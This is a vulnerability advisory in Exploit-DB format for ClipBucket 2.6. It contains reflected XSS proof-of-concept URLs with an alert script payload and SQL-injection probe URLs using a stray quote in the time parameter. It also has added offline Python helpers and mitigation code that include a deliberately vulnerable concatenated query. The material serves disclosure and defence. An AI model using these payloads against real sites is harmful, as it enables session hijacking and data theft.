Vendor: Clip Bucket (Open Source Video Sharing)
By: YaDoY666
CVSS: 7.5 (HIGH)
CWE: 79 (Cross Site Scripting), 89 (SQL Injection)
Product Name: Clip Bucket (Open Source Video Sharing)
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: a:clipbucket:clipbucket:2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2012

Multiple Vulnerability on ClipBucket 2.6

ClipBucket 2.6 is vulnerable to reflected Cross Site Scripting and SQL Injection. The XSS proof-of-concept URLs below inject into the cat parameter (channels.php, collections.php, groups.php, videos.php), the query parameter (search_result.php) and the type parameter (view_collection.php, view_item.php); the SQL injection proof of concept uses the time parameter of videos.php and channels.php. The other parameters in those URLs (seo_cat_name, sort, cid, collection, item) are carried along as ordinary request values and are not demonstrated as injection points. The affected parameters are written back into the page without output encoding, and the time value appears to be spliced into a SQL statement unescaped (a lone single quote is enough to break the query). An attacker who gets a logged-in user to open a crafted link can therefore run arbitrary JavaScript in that user's session on the site, and can alter the query behind the time filter to read data the page would not otherwise return.
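The script below is an added example, not part of the advisory and not ClipBucket code. It builds the advisory's probe URLs from the endpoint/parameter list above and classifies sample responses: whether the XSS probe comes back unescaped, HTML-encoded, or not at all, and whether a response to the time=1' probe exposes a database error. The base URL, the sample response bodies and the error-string patterns are assumptions; it makes no network requests.

```python
"""Offline helper for the ClipBucket 2.6 advisory probes: builds the PoC
URLs and classifies sample responses. Added example, not advisory or
ClipBucket code. Sample bodies below are constructed, not captured."""
import html
import re
from urllib.parse import quote, urlencode, urljoin

# The advisory's XSS probe, URL-decoded. The leading '"()&%1 characters
# test whether the value can break out of quoted attribute/JS contexts
# before the tag itself is tried.
XSS_PAYLOAD = "'\"()&%1<ScRiPt >alert('YaDoY666 Was Here')</ScRiPt>"
# The advisory's SQL-injection probe: a lone single quote in `time`.
SQLI_PAYLOAD = "1'"

INJECT = object()  # marks the parameter that receives the payload

# Endpoints and parameters exactly as in the advisory's PoC URLs.
XSS_TARGETS = [
    ("channels.php", {"cat": INJECT, "seo_cat_name": "", "sort": "most_recent", "time": "all_time"}),
    ("collections.php", {"cat": INJECT, "seo_cat_name": "", "sort": "most_recent", "time": "all_time"}),
    ("groups.php", {"cat": INJECT, "seo_cat_name": "", "sort": "most_recent", "time": "all_time"}),
    ("search_result.php", {"query": INJECT, "submit": "Search", "type": ""}),
    ("videos.php", {"cat": INJECT, "seo_cat_name": "", "sort": "most_recent", "time": "all_time"}),
    ("view_collection.php", {"cid": "9", "type": INJECT}),
    ("view_item.php", {"collection": "9", "item": "KWSWG7S983SY", "type": INJECT}),
]
SQLI_TARGETS = [
    ("videos.php", {"cat": "all", "seo_cat_name": "", "sort": "most_recent", "time": INJECT}),
    ("channels.php", {"cat": "all", "seo_cat_name": "", "sort": "most_recent", "time": INJECT}),
]


def probe_urls(base, targets, payload):
    """Substitute the payload into each target and return the full URLs.
    quote (not quote_plus) keeps spaces as %20 like the advisory's URLs."""
    urls = []
    for script, params in targets:
        filled = {k: (payload if v is INJECT else v) for k, v in params.items()}
        urls.append(urljoin(base, script) + "?" + urlencode(filled, safe="", quote_via=quote))
    return urls


TAG_RE = re.compile(r"<[^>]*>")


def classify_reflection(payload, body):
    """How the probe comes back in a response body:
    'unescaped' - the payload, or at least one of its tags, is present
                  verbatim, so the browser parses the injected <ScRiPt>;
    'encoded'   - the text is present only with entities substituted
                  (e.g. &lt;ScRiPt&gt;), i.e. the output was HTML-escaped;
    'absent'    - the parameter is not reflected into this page at all.
    A filter that encodes quotes but not angle brackets still counts as
    'unescaped', because the tag survives."""
    if payload in body:
        return "unescaped"
    if payload not in html.unescape(body):
        return "absent"
    if any(tag in body for tag in TAG_RE.findall(payload)):
        return "unescaped"
    return "encoded"


# Error text PHP/MySQL emit when a broken statement reaches the database
# and display_errors is on. A quiet 200 proves nothing either way.
SQL_ERROR_RE = re.compile(
    r"You have an error in your SQL syntax"
    r"|supplied argument is not a valid MySQL result resource"
    r"|mysql_(?:query|fetch_\w+|num_rows)\(\)",
    re.I,
)


def sql_error_exposed(body):
    """True if the response shows a database error after the time=1' probe."""
    return SQL_ERROR_RE.search(body) is not None


# Constructed sample responses (not captured from a real install).
VULNERABLE_BODY = f"<h2>Category: {XSS_PAYLOAD}</h2>"
PATCHED_BODY = f"<h2>Category: {html.escape(XSS_PAYLOAD, quote=True)}</h2>"
HALF_PATCHED_BODY = f"<h2>Category: {XSS_PAYLOAD.replace(chr(34), '&quot;')}</h2>"
NOT_REFLECTED_BODY = "<h2>Category: all</h2>"
SQL_ERROR_BODY = ("Warning: mysql_fetch_array(): supplied argument is not a "
                  "valid MySQL result resource in videos.php")

if __name__ == "__main__":
    for url in probe_urls("http://example.invalid/clipbucket/", XSS_TARGETS, XSS_PAYLOAD):
        print(url)
    for name, body in [("vulnerable", VULNERABLE_BODY), ("patched", PATCHED_BODY),
                       ("half-patched", HALF_PATCHED_BODY), ("not reflected", NOT_REFLECTED_BODY)]:
        print(f"{name}: {classify_reflection(XSS_PAYLOAD, body)}")
    print("sql error exposed:", sql_error_exposed(SQL_ERROR_BODY))
```

The half-patched case is the one to keep in mind when verifying a fix: a filter that encodes quotes but leaves angle brackets alone still lets the injected tag through, and a missing error message on the time=1' probe only means errors are not displayed, not that the query was safe.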

Mitigation:

The advisory reports no vendor patch. Reflected XSS is stopped by encoding each parameter for the HTML context it is written into at output time (in PHP, htmlspecialchars with ENT_QUOTES); server-side validation of keyword parameters such as cat, sort and time against an allow-list of expected values is a useful second layer, but input validation alone does not prevent injection. For the SQL injection, the time value (and every other request value) should reach the database through parameterized queries / prepared statements instead of being concatenated into the statement text.
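The following script is an added illustration of both fixes and is not ClipBucket code (ClipBucket is PHP; its real schema and queries are not reproduced). It contrasts a query that splices the cat and time values into SQL text with one that allow-lists the time keyword and binds every value as a parameter, and renders the cat value into HTML with and without output encoding. The video table, the time-window keyword set and the sample rows are all assumptions.

```python
"""The two mitigations in Python on an in-memory SQLite table. Added
example, not ClipBucket code; the `video` table, the time-window
keywords and the sample rows are all assumed."""
import html
import sqlite3

# Allow-listed values for the `time` keyword, mapped to a date cutoff.
# Assumed; ClipBucket's own keyword set is not reproduced here.
TIME_WINDOWS = {"all_time": "0000-00-00", "this_year": "2012-01-01", "this_week": "2012-01-02"}


def make_db():
    """Fresh in-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE video (videoid INTEGER PRIMARY KEY, title TEXT, category TEXT, date_added TEXT)")
    conn.executemany(
        "INSERT INTO video (title, category, date_added) VALUES (?, ?, ?)",
        [("Intro", "music", "2012-01-05"), ("Talk", "tech", "2011-06-01"), ("Archive", "music", "2010-03-15")],
    )
    return conn


def list_videos_unsafe(conn, cat, time_key):
    """Vulnerable pattern: request values are spliced into the SQL text.
    An unknown time keyword falls through as-is (assumed behaviour), so
    time=1' closes the string literal and breaks the statement, and
    time=x' OR '1'='1 turns the WHERE clause into a tautology."""
    cutoff = TIME_WINDOWS.get(time_key, time_key)
    sql = "SELECT title FROM video WHERE 1=1"
    if cat != "all":
        sql += " AND category = '" + cat + "'"
    sql += " AND date_added >= '" + cutoff + "' ORDER BY videoid"
    return [row[0] for row in conn.execute(sql)]


def list_videos_safe(conn, cat, time_key):
    """Fixed pattern: keyword allow-listed, every value bound as a parameter.
    The driver sends values separately from the statement text, so a quote
    in cat or time can never change the query's structure."""
    if time_key not in TIME_WINDOWS:
        raise ValueError(f"unknown time window: {time_key!r}")
    sql = "SELECT title FROM video WHERE date_added >= ?"
    params = [TIME_WINDOWS[time_key]]
    if cat != "all":
        sql += " AND category = ?"
        params.append(cat)
    return [row[0] for row in conn.execute(sql + " ORDER BY videoid", params)]


def run_query(fn, cat, time_key):
    """Run one implementation on a fresh DB and report either
    ('rows', [...]) or ('error', exception class name)."""
    try:
        return ("rows", fn(make_db(), cat, time_key))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


def render_heading_unsafe(cat):
    """Reflects the cat value into HTML untouched: the XSS side of the advisory."""
    return f"<h2>Category: {cat}</h2>"


def render_heading_safe(cat):
    """HTML-encodes the value for an element body; quote=True also covers
    attribute contexts. PHP's counterpart is htmlspecialchars with ENT_QUOTES."""
    return f"<h2>Category: {html.escape(cat, quote=True)}</h2>"


if __name__ == "__main__":
    for cat, t in [("music", "this_year"), ("all", "1'"), ("music", "x' OR '1'='1")]:
        print(f"cat={cat!r} time={t!r}")
        print("  unsafe:", run_query(list_videos_unsafe, cat, t))
        print("  safe:  ", run_query(list_videos_safe, cat, t))
    print(render_heading_unsafe("<script>alert(1)</script>"))
    print(render_heading_safe("<script>alert(1)</script>"))
```

With benign input both implementations return the same rows; with the advisory's time=1' the concatenated version fails with a database error (the symptom the PoC looks for), while the tautology input makes it return every row regardless of the category filter. The parameterized version rejects the unknown keyword up front and treats a quote in cat as nothing more than part of a category name.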

Exploit-DB raw data:

#	Exploit			: Multiple Vulnerability on ClipBucket 2.6
#	Date 			: 09 January 2012
#	Author			: YaDoY666
#	Website			: http://yadoy666.serverisdown.org
#	Software		: Clip Bucket (Open Source Video Sharing)
#	Version			: 2.6 
#	Vendor			: Clip Bucket (http://clip-bucket.com)
#	Vendor Response	: None

Cross Site Scripting
====================

- http://[site]/[path]/channels.php
- http://[site]/[path]/collections.php
- http://[site]/[path]/groups.php
- http://[site]/[path]/search_result.php
- http://[site]/[path]/videos.php
- http://[site]/[path]/view_collection.php
- http://[site]/[path]/view_item.php

Example (the injected value URL-decodes to '"()&%1<ScRiPt >alert('YaDoY666 Was Here')</ScRiPt>; the probe characters in front of the tag check whether the value can also break out of quoted attribute or script-string contexts, and the mixed-case tag name gets past case-sensitive tag blacklists):
http://[site]/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
http://[site]/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
http://[site]/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E

SQL Injection
==============

- http://[site]/[path]/channels.php
- http://[site]/[path]/videos.php

Example (time=1' injects a lone single quote; if the value is spliced into the SQL statement unescaped the query fails, and with PHP error display enabled the MySQL error appears in the response, while a quiet page only means errors are hidden, not that the query is safe):
http://[site]/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
http://[site]/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27


Greets : KombezNux | Jack | X-Shadow | Don Tukulesto | GBlack | elv1n4 | GBlack | Kamtiez | n4ck0 | AaEzha | ServerIsDown | Indonesian Coder |